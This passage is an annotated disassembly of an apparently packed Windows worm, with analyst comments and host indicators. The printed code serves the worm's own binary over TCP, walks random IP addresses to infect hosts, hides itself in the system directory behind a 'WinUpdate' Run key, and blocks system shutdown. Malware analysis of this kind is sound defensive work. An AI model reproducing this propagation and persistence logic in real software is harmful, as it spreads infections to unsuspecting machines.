    retn 4
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; sub_402CF0 - thread that serves a copy of the running executable over TCP.
; Reads the module's own file (path from GetModuleFileNameA, opened with
; access 80000000h, disposition 3) into a buffer from sub_403640; pointer and
; byte count are published in dword_404F64 / dword_404F6C. It then binds a
; socket to a random port, (rand() + 7D0h) & 1FFFh, retrying until both bytes
; of the port are non-zero and bind succeeds; the chosen value is kept in
; dword_404F94. After listen(64h) it loops forever on accept and starts
; loc_402CA0 for every returned socket.
; NOTE(review): the accept result is handed to the thread without a check for
; -1, and the ReadFile result is not checked.
sub_402CF0 proc near ; DATA XREF: UPX0:00402EFCo
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_108 = byte ptr -108h
    sub esp, 130h
    lea eax, [esp+130h+var_108]
    mov dword_404F68, 0
    push ebp
    push esi
    push edi
    push 104h
    push eax
    push 0
    call dword_401064 ; GetModuleFileNameA
    push 0
    push 0
    push 3
    push 0
    push 1
    lea ecx, [esp+150h+var_108]
    push 80000000h
    push ecx
    call dword_401090 ; CreateFileA
    mov esi, eax
    cmp esi, 0FFFFFFFFh
    jnz short loc_402D3E
    push 1
    call dword_4010A0 ; ExitThread
loc_402D3E: ; CODE XREF: sub_402CF0+44j
    push 0
    push esi
    call dword_401068 ; GetFileSize
    push eax
    mov dword_404F6C, eax
    call sub_403640
    mov ecx, dword_404F6C
    add esp, 4
    lea edx, [esp+13Ch+var_120]
    mov dword_404F64, eax
    push 0
    push edx
    push ecx
    push eax
    push esi
    call dword_40106C ; ReadFile
    push esi
    mov edx, [esp+140h+var_120]
    mov dword_404F6C, edx ; length to serve = bytes actually read
    call dword_401088 ; CloseHandle
    push 0
    push 1
    push 2
    call dword_401128 ; socket
    mov esi, eax
    xor eax, eax
    mov edi, dword_40112C
    mov ebp, dword_401130
    mov [esp+13Ch+var_130], eax
    mov word ptr [esp+13Ch+var_130], 2
    mov [esp+13Ch+var_12C], eax
    mov [esp+13Ch+var_128], eax
    mov [esp+13Ch+var_124], eax
    mov [esp+13Ch+var_12C], eax
loc_402DB8: ; CODE XREF: sub_402CF0+DEj
    ; sub_402CF0+E6j ...
    call sub_403680 ; rand
    add eax, 7D0h
    and eax, 1FFFh
    test al, al
    mov dword_404F94, eax
    jz short loc_402DB8
    xor ecx, ecx
    mov cl, ah
    test cl, cl
    jz short loc_402DB8
    push eax
    call edi ; ntohs
    lea edx, [esp+13Ch+var_130]
    push 10h
    push edx
    push esi
    mov word ptr [esp+148h+var_130+2], ax
    call ebp ; bind
    test eax, eax
    jnz short loc_402DB8
    push 64h
    push esi
    call dword_401134 ; listen
    mov edi, dword_401138
    mov [esp+13Ch+var_11C], 10h
loc_402E05: ; CODE XREF: sub_402CF0+130j
    lea eax, [esp+13Ch+var_11C]
    lea ecx, [esp+13Ch+var_118]
    push eax
    push ecx
    push esi
    call edi ; accept
    push eax
    push offset loc_402CA0
    call sub_402B00
    add esp, 8
    jmp short loc_402E05
sub_402CF0 endp
; ---------------------------------------------------------------------------
    align 10h
; loc_402E30 - program start after unpacking (jumped to from UPX1:00407098).
; Visible behaviour, in order:
;   - GetModuleHandleA(0) -> dword_404F98; WSAStartup(2, buffer on stack).
;   - esi = 1 if the command line contains "-u", else 0.
;   - DeleteFileA("go.exe"); srand(GetTickCount()).
;   - CreateMutexA for "r10", "u2" and "uterm5"; if the last error after the
;     third call is 0B7h the process exits with code 1 (single-instance guard).
;   - Without "-u", call sub_403540 (outside this chunk).
;   - Start five threads through sub_402B00: sub_402F80, then after 1F4h ms
;     sub_402590, sub_402CF0, sub_4015E0 and loc_4032A0.
;   - Loop forever: AbortSystemShutdownA(0), Sleep(1388h).
; The three mutex names and the deleted file name are stable host indicators
; for this sample.
loc_402E30: ; CODE XREF: UPX1:00407098j
    sub esp, 190h
    push esi
    push edi
    push 0
    call dword_401054 ; GetModuleHandleA
    mov dword_404F98, eax
    lea eax, [esp+8]
    push eax
    push 2
    call dword_401104 ; WSAStartup
    push offset aU ; "-u"
    call dword_401058 ; GetCommandLineA
    push eax
    call sub_4036C6 ; strstr
    mov esi, eax
    add esp, 8
    neg esi ; neg/sbb/neg turns the strstr result into 0 or 1
    sbb esi, esi
    push offset aGo_exe ; "go.exe"
    neg esi
    call dword_40105C ; DeleteFileA
    call dword_401078 ; GetTickCount
    push eax
    call sub_403686 ; srand
    mov edi, dword_401060
    add esp, 4
    push offset aR10 ; "r10"
    push 1
    push 0
    call edi ; CreateMutexA
    push offset aU2 ; "u2"
    push 1
    push 0
    call edi ; CreateMutexA
    push offset aUterm5 ; "uterm5"
    push 1
    push 0
    call edi ; CreateMutexA
    mov dword_404F70, eax
    call dword_40107C ; RtlGetLastWin32Error
    cmp eax, 0B7h
    jnz short loc_402EC9
    push 1
    call dword_4010C0 ; ExitProcess
loc_402EC9: ; CODE XREF: UPX0:00402EBFj
    test esi, esi
    jnz short loc_402ED2
    call sub_403540
loc_402ED2: ; CODE XREF: UPX0:00402ECBj
    push 0
    push offset sub_402F80
    call sub_402B00
    mov esi, dword_4010B8
    add esp, 8
    push 1F4h
    call esi ; Sleep
    push 0
    push offset sub_402590
    call sub_402B00
    push 0
    push offset sub_402CF0
    call sub_402B00
    push 0
    push offset sub_4015E0
    call sub_402B00
    push 0
    push offset loc_4032A0
    call sub_402B00
    mov edi, dword_401018
    add esp, 20h
loc_402F27: ; CODE XREF: UPX0:00402F32j
    push 0
    call edi ; AbortSystemShutdownA
    push 1388h
    call esi ; Sleep
    jmp short loc_402F27
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_402F40 - cut a string at its first CR or LF.
; In:   arg_0 = NUL-terminated string (cdecl), modified in place
; The string length is recomputed with repne scasb on every pass, so the loop
; ends as soon as a 0Ah or 0Dh byte has been replaced by NUL.
sub_402F40 proc near ; CODE XREF: sub_402F80+135p
arg_0 = dword ptr 4
    push esi
    mov esi, [esp+4+arg_0]
    push edi
    mov edi, esi
    or ecx, 0FFFFFFFFh
    xor eax, eax
    xor edx, edx
    repne scasb
    not ecx
    dec ecx
    jz short loc_402F76
loc_402F56: ; CODE XREF: sub_402F40+34j
    mov al, [edx+esi]
    cmp al, 0Ah
    jz short loc_402F61
    cmp al, 0Dh
    jnz short loc_402F65
loc_402F61: ; CODE XREF: sub_402F40+1Bj
    mov byte ptr [edx+esi], 0
loc_402F65: ; CODE XREF: sub_402F40+1Fj
    mov edi, esi
    or ecx, 0FFFFFFFFh
    xor eax, eax
    inc edx
    repne scasb
    not ecx
    dec ecx
    cmp edx, ecx
    jb short loc_402F56
loc_402F76: ; CODE XREF: sub_402F40+14j
    pop edi
    pop esi
    retn
sub_402F40 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; sub_402F80 - thread that answers queries on TCP port 71h (113).
; Startup: srand(GetTickCount() * esp); generate a random user id of
; rand() % 4 + 3 letters into var_48 and copy it to dword_404F74; bind a
; socket to address ntohl(0), port ntohs(71h); listen(5). Returns 1 if bind
; or listen fails.
; Loop: accept (retrying every 64h ms on -1), recv up to 100h bytes into
; var_148, strip at the first CR/LF (sub_402F40), append
; " : USERID : UNIX : ", the stored id and "\r\n", send the result, wait
; 1388h ms and close the connection.
; NOTE(review): only a recv result of 0 is handled. A result of -1 places the
; terminator one byte before var_148, and the three inline concatenations have
; no length check against the 100h-byte buffer, so a full-length request makes
; the appended text run past var_148 into the locals above it.
sub_402F80 proc near ; DATA XREF: UPX0:00402ED4o
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
    push ebp
    mov ebp, esp
    sub esp, 148h
    push esi
    push edi
    mov [ebp+var_8], esp
    call dword_401078 ; GetTickCount
    imul eax, [ebp+var_8]
    push eax
    call sub_403686 ; srand
    call sub_403680 ; rand
    and eax, 80000003h ; signed rand() % 4
    jns short loc_402FAF
    dec eax
    or eax, 0FFFFFFFCh
    inc eax
loc_402FAF: ; CODE XREF: sub_402F80+28j
    add eax, 3
    push eax
    lea eax, [ebp+var_48]
    push eax
    call sub_402B30
    lea edi, [ebp+var_48]
    or ecx, 0FFFFFFFFh
    xor eax, eax
    add esp, 0Ch
    repne scasb ; inline copy of var_48 (with terminator) to dword_404F74
    not ecx
    sub edi, ecx
    push eax ; 0, third argument of the socket call below
    mov edx, ecx
    mov esi, edi
    mov edi, offset dword_404F74
    push 1
    shr ecx, 2
    rep movsd
    mov ecx, edx
    push 2
    and ecx, 3
    mov [ebp+var_4], 10h
    rep movsb
    call dword_401128 ; socket
    mov esi, eax
    push 0
    mov [ebp+var_8], esi ; listening socket, reloaded at the end of each pass
    mov [ebp+var_18], 2
    call dword_401108 ; ntohl
    push 71h
    mov [ebp+var_14], eax
    call dword_40112C ; ntohs
    mov [ebp+var_16], ax
    mov eax, [ebp+var_4]
    lea ecx, [ebp+var_18]
    push eax
    push ecx
    push esi
    call dword_401130 ; bind
    test eax, eax
    jz short loc_403036
    pop edi
    mov eax, 1
    pop esi
    mov esp, ebp
    pop ebp
    retn 4
; ---------------------------------------------------------------------------
loc_403036: ; CODE XREF: sub_402F80+A7j
    push ebx
    push 5
    push esi
    call dword_401134 ; listen
    test eax, eax
    jz short loc_403052
    pop ebx
    pop edi
    mov eax, 1
    pop esi
    mov esp, ebp
    pop ebp
    retn 4
; ---------------------------------------------------------------------------
loc_403052: ; CODE XREF: sub_402F80+C2j
    ; sub_402F80+124j ...
    mov edi, dword_401138
    lea edx, [ebp+var_4]
    lea eax, [ebp+var_28]
    push edx
    push eax
    push esi
    call edi ; accept
    mov ebx, eax
    cmp ebx, 0FFFFFFFFh
    jnz short loc_403084
loc_40306A: ; CODE XREF: sub_402F80+102j
    push 64h
    call dword_4010B8 ; Sleep
    lea ecx, [ebp+var_4]
    lea edx, [ebp+var_28]
    push ecx
    push edx
    push esi
    call edi ; accept
    mov ebx, eax
    cmp ebx, 0FFFFFFFFh
    jz short loc_40306A
loc_403084: ; CODE XREF: sub_402F80+E8j
    push 0
    lea eax, [ebp+var_148]
    push 100h
    push eax
    push ebx
    call dword_401144 ; recv
    test eax, eax
    jnz short loc_4030A6
    push ebx
    call dword_401140 ; closesocket
    jmp short loc_403052
; ---------------------------------------------------------------------------
loc_4030A6: ; CODE XREF: sub_402F80+11Bj
    lea ecx, [ebp+var_148]
    mov [ebp+eax+var_148], 0
    push ecx
    call sub_402F40
    ; inline concatenation #1: append " : USERID : UNIX : " to var_148
    or ecx, 0FFFFFFFFh
    mov edi, offset aUseridUnix ; " : USERID : UNIX : "
    xor eax, eax
    add esp, 4
    repne scasb
    not ecx
    sub edi, ecx
    lea edx, [ebp+var_148]
    mov esi, edi
    mov edi, edx
    mov edx, ecx
    or ecx, 0FFFFFFFFh
    repne scasb
    mov ecx, edx
    dec edi
    shr ecx, 2
    rep movsd
    mov ecx, edx
    lea edx, [ebp+var_148]
    and ecx, 3
    push eax ; 0, consumed as the flags argument of send below
    rep movsb
    ; inline concatenation #2: append the id stored at dword_404F74
    mov edi, offset dword_404F74
    or ecx, 0FFFFFFFFh
    repne scasb
    not ecx
    sub edi, ecx
    mov esi, edi
    mov edi, edx
    mov edx, ecx
    or ecx, 0FFFFFFFFh
    repne scasb
    mov ecx, edx
    dec edi
    shr ecx, 2
    rep movsd
    mov ecx, edx
    lea edx, [ebp+var_148]
    and ecx, 3
    rep movsb
    ; inline concatenation #3: append CR LF
    mov edi, offset asc_404D8C ; "\r\n"
    or ecx, 0FFFFFFFFh
    repne scasb
    not ecx
    sub edi, ecx
    mov esi, edi
    mov edi, edx
    mov edx, ecx
    or ecx, 0FFFFFFFFh
    repne scasb
    mov ecx, edx
    dec edi
    shr ecx, 2
    rep movsd
    mov ecx, edx
    and ecx, 3
    rep movsb
    lea edi, [ebp+var_148]
    or ecx, 0FFFFFFFFh
    repne scasb
    not ecx
    dec ecx ; ecx = length of the assembled reply
    lea eax, [ebp+var_148]
    push ecx
    push eax
    push ebx
    call dword_401148 ; send
    push 1388h
    call dword_4010B8 ; Sleep
    push ebx
    call dword_401140 ; closesocket
    mov esi, [ebp+var_8]
    jmp loc_403052
sub_402F80 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; sub_403190 - call sub_4016E0 once per value of the top byte of the argument.
; In:   one 32-bit argument at [esp+4]; arg_3 is its highest byte
; Out:  eax = 0
; bl runs from 0 to 0FEh. The original top byte (saved in var_1) is skipped;
; for every other value the byte is written back into the argument, the
; argument is passed to sub_4016E0 (outside this chunk) and the thread sleeps
; rand() % 190h + 190h ms. The loop stops early when sub_402C70 reports no
; connectivity.
; NOTE(review): presumably the argument is an IPv4 address in network byte
; order, which would make this a walk over the last octet - confirm in
; sub_4031F0 and sub_4016E0.
sub_403190 proc near ; DATA XREF: sub_4031F0+86o
    ; UPX0:004032FCo
var_1 = byte ptr -1
arg_3 = byte ptr 7
    push ecx
    mov al, [esp+4+arg_3]
    push ebx
    push esi
    mov esi, dword_4010B8
    mov [esp+0Ch+var_1], al
    xor bl, bl
loc_4031A3: ; CODE XREF: sub_403190+4Aj
    call sub_402C70
    test eax, eax
    jz short loc_4031DC
    cmp [esp+0Ch+var_1], bl
    jz short loc_4031D5
    mov [esp+0Ch+arg_3], bl
    mov ecx, [esp+10h]
    push ecx
    call sub_4016E0
    add esp, 4
    call sub_403680 ; rand
    cdq
    mov ecx, 190h
    idiv ecx
    add edx, ecx
    push edx
    call esi ; Sleep
loc_4031D5: ; CODE XREF: sub_403190+20j
    inc bl
    cmp bl, 0FFh
    jb short loc_4031A3
loc_4031DC: ; CODE XREF: sub_403190+1Aj
    pop esi
    xor eax, eax
    pop ebx
    pop ecx
    retn 4
sub_403190 endp
; ---------------------------------------------------------------------------
    align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; sub_4031F0 continues past the end of this chunk; the visible prologue is
; reproduced unchanged.
sub_4031F0 proc near ; DATA XREF: UPX0:00403310o
var_8 = dword ptr -8
var_4 = dword ptr -4
    push ebp
    mov ebp, esp
    sub esp, 8
    push ebx
    push esi
    push edi
    pusha
    rdtsc
    mov [ebp+var_8], eax
    popa
    mov [ebp+var_4], esp
    call
dword_401078 ; GetTickCount mov ecx, [ebp+var_4] imul ecx, [ebp+var_8] add eax, ecx push eax call sub_403686 ; srand add esp, 4 call nullsub_1 mov ebx, dword_401070 mov edi, dword_4010B8 loc_40322C: ; CODE XREF: sub_4031F0+66j ; sub_4031F0+AEj call sub_403680 ; rand mov byte ptr [ebp+var_4+1], al call sub_403680 ; rand mov byte ptr [ebp+var_4+3], al call sub_403680 ; rand mov byte ptr [ebp+var_4+2], al call sub_403680 ; rand mov byte ptr [ebp+var_4], al call sub_402C20 mov esi, [ebp+var_4] cmp esi, eax jz short loc_40322C call sub_402C70 test eax, eax jz short loc_403285 push offset dword_404F9C call ebx ; InterlockedIncrement push esi call sub_4016E0 add esp, 4 test eax, eax jnz short loc_40328C push esi push offset sub_403190 call sub_402B00 add esp, 8 jmp short loc_40328C ; --------------------------------------------------------------------------- loc_403285: ; CODE XREF: sub_4031F0+6Fj push 1388h call edi ; Sleep loc_40328C: ; CODE XREF: sub_4031F0+83j ; sub_4031F0+93j call sub_403680 ; rand cdq mov ecx, 190h idiv ecx add edx, ecx push edx call edi ; Sleep jmp short loc_40322C sub_4031F0 endp ; --------------------------------------------------------------------------- loc_4032A0: ; DATA XREF: UPX0:00402F14o push esi push edi mov dword_404F9C, 0 call sub_402C70 mov edi, dword_4010B8 test eax, eax jnz short loc_4032CB loc_4032BB: ; CODE XREF: UPX0:004032C9j push 1388h call edi ; Sleep call sub_402C70 test eax, eax jz short loc_4032BB loc_4032CB: ; CODE XREF: UPX0:004032B9j call sub_402C20 mov esi, eax mov ax, word ptr dword_404F94 push eax call dword_40112C ; ntohs mov ecx, esi mov word_404122, ax xor ecx, 0AAAAAAAAh cmp esi, 100007Fh mov dword_404124, ecx jz short loc_403309 push esi push offset sub_403190 call sub_402B00 add esp, 8 loc_403309: ; CODE XREF: UPX0:004032F9j mov esi, 50h loc_40330E: ; CODE XREF: UPX0:0040331Ej push 0 push offset sub_4031F0 call sub_402B00 add esp, 8 dec esi jnz short loc_40330E push 0FFFFFFFFh call edi ; Sleep pop edi xor eax, 
eax pop esi retn ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_403330 proc near ; CODE XREF: sub_403540+C9p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch mov ecx, [esp+arg_4] mov edx, [esp+arg_0] lea eax, [esp+arg_4] push eax push 0F003Fh push 0 push ecx push edx call dword_40100C ; RegOpenKeyExA test eax, eax jnz short locret_40336B mov eax, [esp+arg_8] mov ecx, [esp+arg_4] push eax push ecx call dword_401010 ; RegDeleteValueA mov edx, [esp+arg_4] push edx call dword_401014 ; RegCloseKey locret_40336B: ; CODE XREF: sub_403330+1Ej retn sub_403330 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_403370 proc near ; CODE XREF: sub_403540+3Dp ; sub_403540+A4p var_4 = dword ptr -4 arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h arg_10 = dword ptr 14h arg_14 = dword ptr 18h push ecx mov eax, [esp+4+arg_10] mov edx, [esp+4+arg_4] lea ecx, [esp+4+arg_10] mov [esp+4+var_4], eax mov eax, [esp+4+arg_0] push ecx push 0F003Fh push 0 push edx push eax call dword_40100C ; RegOpenKeyExA test eax, eax jz short loc_4033A0 mov eax, 1 pop ecx retn ; --------------------------------------------------------------------------- loc_4033A0: ; CODE XREF: sub_403370+27j mov edx, [esp+4+arg_C] lea ecx, [esp+4+var_4] push ecx mov ecx, [esp+8+arg_8] lea eax, [esp+8+arg_4] push edx mov edx, [esp+0Ch+arg_10] push eax push 0 push ecx push edx call dword_401008 ; RegQueryValueExA test eax, eax jz short loc_4033D7 mov eax, [esp+arg_14] push eax call dword_401014 ; RegCloseKey mov eax, 2 pop ecx retn ; --------------------------------------------------------------------------- loc_4033D7: ; CODE XREF: sub_403370+53j mov ecx, [esp+arg_14] push ecx call dword_401014 ; RegCloseKey xor eax, eax pop ecx retn 
sub_403370      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; sub_4033F0 -- create (or open) a registry key and write one value of type 1
; (REG_SZ) into it.
; In:    arg_0 = root key, arg_4 = subkey name, arg_8 = value name,
;        arg_C = data, arg_10 = data size in bytes
;        (five stack arguments, removed by the caller).
; Out:   eax = 0 on success, 1 if RegCreateKeyExA fails, 2 if RegSetValueExA
;        fails.
; The arg_4 slot is reused to receive the key handle. Access mask is 0F003Fh
; (KEY_ALL_ACCESS).
sub_4033F0      proc near               ; CODE XREF: sub_403460+A1p ; sub_403540+5Fp

arg_0           = dword ptr  4
arg_4           = dword ptr  8
arg_8           = dword ptr  0Ch
arg_C           = dword ptr  10h
arg_10          = dword ptr  14h

        mov     ecx, [esp+arg_4]
        mov     edx, [esp+arg_0]
        lea     eax, [esp+arg_4]        ; receives the key handle
        push    0
        push    eax
        push    0
        push    0F003Fh
        push    0
        push    0
        push    0
        push    ecx
        push    edx
        call    dword_401000            ; RegCreateKeyExA
        test    eax, eax
        jz      short loc_40341E
        mov     eax, 1
        retn
; ---------------------------------------------------------------------------

loc_40341E:                             ; CODE XREF: sub_4033F0+26j
        mov     eax, [esp+arg_10]
        mov     ecx, [esp+arg_C]
        mov     edx, [esp+arg_8]
        push    eax                     ; data size
        mov     eax, [esp+4+arg_4]
        push    ecx                     ; data
        push    1                       ; type 1 = REG_SZ
        push    0
        push    edx                     ; value name
        push    eax                     ; key handle
        call    dword_401004            ; RegSetValueExA
        test    eax, eax
        jz      short loc_403451
        mov     ecx, [esp+arg_4]
        push    ecx
        call    dword_401014            ; RegCloseKey
        mov     eax, 2
        retn
; ---------------------------------------------------------------------------

loc_403451:                             ; CODE XREF: sub_4033F0+4Ej
        mov     edx, [esp+arg_4]
        push    edx
        call    dword_401014            ; RegCloseKey
        xor     eax, eax
        retn
sub_4033F0      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; sub_403460 -- install step: copy the executable into the system directory
; under a random name, register it for start-up, launch the copy and exit.
; In:    arg_0 = path of an older copy to delete first (may be 0),
;        arg_4 = path of the file to copy
;        (two stack arguments, removed by the caller).
; Returns only when GetSystemDirectoryA fails; otherwise ends in ExitProcess.
; Locals: var_78 = 14h-byte file name, var_64 = 64h-byte full path.
; Host indicators visible in this routine:
;   - file <system directory>\<5..8 characters>.exe
;     (the name comes from sub_402B30, presumably random characters -- confirm)
;   - value "WinUpdate" under root 80000002h (HKEY_LOCAL_MACHINE), key
;     SOFTWARE\Microsoft\Windows\CurrentVersion\Run, pointing at that file
; NOTE(review): the results of CopyFileA, sub_4033F0 and WinExec are ignored,
; so the process exits even if the copy or the registry write failed.
sub_403460      proc near               ; CODE XREF: sub_403540+6Bp ; sub_403540+E2p

var_78          = byte ptr -78h
var_64          = byte ptr -64h
arg_0           = dword ptr  4
arg_4           = dword ptr  8

        mov     eax, [esp+arg_0]
        sub     esp, 78h
        test    eax, eax
        jz      short loc_403472
        push    eax
        call    dword_40105C            ; DeleteFileA

loc_403472:                             ; CODE XREF: sub_403460+9j
        lea     eax, [esp+78h+var_64]
        push    63h
        push    eax
        call    dword_40109C            ; GetSystemDirectoryA
        test    eax, eax
        jz      loc_403537
        push    esi
        call    sub_403680              ; rand
        and     eax, 3
        lea     ecx, [esp+7Ch+var_78]
        add     eax, 5                  ; name length 5..8
        push    eax
        push    ecx
        call    sub_402B30
        mov     esi, dword_4010BC       ; lstrcatA
        add     esp, 8
        lea     edx, [esp+7Ch+var_78]
        push    offset a_exe            ; ".exe"
        push    edx
        call    esi                     ; lstrcatA
        lea     eax, [esp+7Ch+var_64]
        push    offset asc_404D18       ; "\\"
        push    eax
        call    esi                     ; lstrcatA
        lea     ecx, [esp+7Ch+var_78]
        lea     edx, [esp+7Ch+var_64]
        push    ecx
        push    edx
        call    esi                     ; lstrcatA
        mov     ecx, [esp+7Ch+arg_4]
        lea     eax, [esp+7Ch+var_64]
        push    0                       ; overwrite an existing file
        push    eax                     ; destination
        push    ecx                     ; source
        call    dword_40104C            ; CopyFileA
        lea     edx, [esp+7Ch+var_64]
        push    edx
        call    dword_4010B4            ; lstrlenA
        inc     eax                     ; size includes the terminator
        push    eax
        lea     eax, [esp+80h+var_64]
        push    eax
        push    offset aWinupdate       ; "WinUpdate"
        push    offset aSoftwareMicros  ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        push    80000002h
        call    sub_4033F0
        mov     ecx, dword_404F70       ; NOTE(review): presumably the single-instance mutex handle -- confirm where it is written
        add     esp, 14h
        push    ecx
        call    dword_401088            ; CloseHandle
        lea     edx, [esp+7Ch+var_64]
        push    0                       ; show-window value 0
        push    edx
        call    dword_401050            ; WinExec
        push    1F4h                    ; 500 ms
        call    dword_4010B8            ; Sleep
        push    0
        call    dword_4010C0            ; ExitProcess
        pop     esi

loc_403537:                             ; CODE XREF: sub_403460+21j
        add     esp, 78h
        retn
sub_403460      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; sub_403540 -- start-up check that decides whether this process is already
; the installed copy.
;   - reads its own path (var_C8) and the current "WinUpdate" Run value (var_64)
;   - no Run value: writes Server = "1" under Software\Microsoft\Wireless and
;     calls sub_403460(0, own path)
;   - Run value names another file: calls sub_403460(old path, own path)
;   - Run value names this file: if the "Server" value exists, sets
;     dword_404FA0 to 1 and deletes the value
; Locals: var_DC = 14h-byte buffer for the "Server" value, var_C8 = own path,
; var_64 = path read from the Run value.
; Host indicator: value "Server" under HKEY_LOCAL_MACHINE\Software\Microsoft\Wireless.
sub_403540      proc near               ; CODE XREF: UPX0:00402ECDp

var_DC          = byte ptr -0DCh
var_C8          = byte ptr -0C8h
var_64          = byte ptr -64h

        sub     esp, 0DCh
        lea     eax, [esp+0DCh+var_C8]
        push    63h
        push    eax
        push    0
        call    dword_401064            ; GetModuleFileNameA
        test    eax, eax
        jz      loc_40362A
        lea     ecx, [esp+0DCh+var_64]
        push    63h
        push    ecx
        push    offset aWinupdate       ; "WinUpdate"
        push    offset aSoftwareMicros  ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
        ; (sub_403540 continues; its first instructions are on the preceding lines)
        push    80000002h               ; root = HKEY_LOCAL_MACHINE
        mov     dword_404FA0, 0
        call    sub_403370              ; read the "WinUpdate" Run value into var_64
        add     esp, 14h
        test    eax, eax
        jz      short loc_4035BA
        ; No Run value: leave a marker value and install.
        push    2
        push    offset a1_0             ; "1"
        push    offset aServer          ; "Server"
        push    offset aSoftwareMicr_0  ; "Software\\Microsoft\\Wireless"
        push    80000002h
        call    sub_4033F0
        lea     edx, [esp+0F0h+var_C8]
        push    edx                     ; own path
        push    0                       ; nothing to delete
        call    sub_403460              ; does not return when the system directory is available
        add     esp, 1Ch                ; drops the arguments of both calls
        add     esp, 0DCh
        retn
; ---------------------------------------------------------------------------

loc_4035BA:                             ; CODE XREF: sub_403540+47j
        lea     eax, [esp+0DCh+var_C8]
        lea     ecx, [esp+0DCh+var_64]
        push    eax
        push    ecx
        call    dword_401048            ; lstrcmpiA
        test    eax, eax
        jnz     short loc_403618        ; Run value names a different file
        ; Running from the registered path: look for the marker value.
        lea     edx, [esp+0DCh+var_DC]
        push    14h
        push    edx
        push    offset aServer          ; "Server"
        push    offset aSoftwareMicr_0  ; "Software\\Microsoft\\Wireless"
        push    80000002h
        call    sub_403370
        add     esp, 14h
        test    eax, eax
        jnz     short loc_40362A
        push    offset aServer          ; "Server"
        push    offset aSoftwareMicr_0  ; "Software\\Microsoft\\Wireless"
        push    80000002h
        mov     dword_404FA0, 1         ; marker was present (consumers are outside this excerpt)
        call    sub_403330              ; delete the marker value
        add     esp, 0Ch
        add     esp, 0DCh
        retn
; ---------------------------------------------------------------------------

loc_403618:                             ; CODE XREF: sub_403540+8Cj
        lea     eax, [esp+0DCh+var_C8]
        lea     ecx, [esp+0DCh+var_64]
        push    eax                     ; own path
        push    ecx                     ; previously registered path, deleted by sub_403460
        call    sub_403460
        add     esp, 8

loc_40362A:                             ; CODE XREF: sub_403540+17j ; sub_403540+AEj
        add     esp, 0DCh
        retn
sub_403540      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; sub_403640 -- allocation helper: VirtualAlloc(0, arg_0, 1000h, 4), i.e.
; MEM_COMMIT with PAGE_READWRITE. Returns the VirtualAlloc result in eax.
sub_403640      proc near               ; CODE XREF: sub_4011F0+29p ; sub_401520+24p ...

arg_0           = dword ptr  4

        mov     eax, [esp+arg_0]
        push    4
        push    1000h
        push    eax
        push    0
        call    dword_401044            ; VirtualAlloc
        retn
sub_403640      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; sub_403660 -- release helper: VirtualFree(arg_0, 0, 8000h), i.e. MEM_RELEASE.
; Returns the VirtualFree result in eax.
sub_403660      proc near               ; CODE XREF: sub_4011F0+EEp ; sub_4011F0+136p ...

arg_0           = dword ptr  4

        mov     eax, [esp+arg_0]
        push    8000h
        push    0
        push    eax
        call    dword_401040            ; VirtualFree
        retn
sub_403660      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; Import thunk; call sites in this listing label it rand.
sub_403680      proc near               ; CODE XREF: sub_4011F0+11Fp ; sub_402230+9p ...
        jmp     dword_4010E0
sub_403680      endp


; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; Import thunk; call sites in this listing label it srand.
sub_403686      proc near               ; CODE XREF: sub_4011F0+117p ; sub_402510+32p ...
        jmp     dword_4010DC
sub_403686      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; sub_403690 -- stack allocation with page probing: eax = number of bytes.
; Touches the stack one 1000h page at a time, moves esp down by eax and
; returns to the caller on the new stack, with ecx restored. This matches the
; shape of a compiler stack-probe helper (presumably the runtime's _chkstk).
sub_403690      proc near               ; CODE XREF: sub_4016E0+5p

arg_0           = byte ptr  4

        push    ecx
        cmp     eax, 1000h
        lea     ecx, [esp+4+arg_0]      ; caller's stack pointer after the return
        jb      short loc_4036B0

loc_40369C:                             ; CODE XREF: sub_403690+1Ej
        sub     ecx, 1000h
        sub     eax, 1000h
        test    [ecx], eax              ; touch the page
        cmp     eax, 1000h
        jnb     short loc_40369C

loc_4036B0:                             ; CODE XREF: sub_403690+Aj
        sub     ecx, eax
        mov     eax, esp
        test    [ecx], eax              ; touch the final page
        mov     esp, ecx                ; new stack top
        mov     ecx, [eax]              ; restore saved ecx
        mov     eax, [eax+4]            ; return address
        push    eax
        retn
sub_403690      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; Import thunk through dword_4010D8. NOTE(review): the slot sits between the
; ones used for srand/rand and the exception-handler thunk; the target name is
; not shown here -- confirm against the import table.
sub_4036C0      proc near               ; CODE XREF: sub_401C90+44p ; sub_401C90+71p ...
        jmp     dword_4010D8
sub_4036C0      endp


; =============== S U B R O U T I N E =======================================
; Attributes: thunk
